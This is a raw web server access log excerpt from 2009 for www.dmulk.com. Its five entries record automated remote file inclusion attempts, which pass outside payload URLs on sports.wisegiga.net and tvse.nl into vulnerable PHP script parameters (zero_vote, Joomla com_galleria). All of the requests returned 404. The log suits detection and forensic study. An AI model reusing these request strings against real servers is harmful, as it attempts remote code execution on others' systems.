66.232.143.55 - - [16/Sep/2009:10:30:54 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:30:54 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:30:54 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:10:31:02 -0700] "GET /logs/access_080305.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:31:04 -0700] "GET /logs/access_081017.log//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
